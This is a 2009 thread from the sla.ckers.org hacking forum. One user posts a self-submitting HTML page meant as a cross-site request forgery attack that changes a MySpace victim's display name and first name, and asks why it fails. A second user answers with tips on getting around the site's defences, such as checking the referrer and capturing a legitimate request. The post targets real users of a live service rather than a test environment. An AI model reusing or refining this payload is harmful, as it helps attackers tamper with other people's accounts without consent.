Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace .. maybe..CSRF on it??
Posted by: XaDoS
Date: August 28, 2009 11:40AM

Hello guys!
I discovered one day ago with my friend 3 CSRF on netlog and now i will see for myspace.. it's difficult I know, because there are some captcha, token and other protection but..
I want ask you why it's impossible change user_name of victim??
I try with a easy html code for try, but don't work.. and I will know the motivation of it.

my_poc:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>change_username_of_myspace_victim_user</title>
</head>
<body>
<form name="XaDoS" action="http://profileedit.myspace.com/index.cfm?fuseaction=accountSettings.contactInfo" method="post">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$DisplayName" value="[NICKNAME]" maxlength="50" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_DisplayName" type="text">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$FirstName" value="[NAME]" size="40" id="ctl00_ctl00_cpMain_cpMain_ContactInfo_FirstName" type="text">
<td class="SubSettingsListValue">
<input name="ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation" value="Salva modifiche" onclick='if(!Page_ClientValidate()) return showErrorMessage();WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("ctl00$ctl00$cpMain$cpMain$ContactInfo$btnSaveLocation", "", true, "", "", false, false))' id="ctl00_ctl00_cpMain_cpMain_ContactInfo_btnSaveLocation" type="submit">
</td>
</form>
<script>document.XaDoS.submit()</script>
</body>
</html>

Legend::

[NICKNAME] = the nickname for the victim user ;
[NAMW] = the name for the victim user ;

So.. where are the problems??
thanks a lot in advance for your time

XaDoS

Options: ReplyQuote
Re: Myspace .. maybe..CSRF on it??
Posted by: PaPPy
Date: August 28, 2009 02:41PM

maybe the check the page referral?
try capturing the data that is used when you legitimatly change your name on myspace and analyze it

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.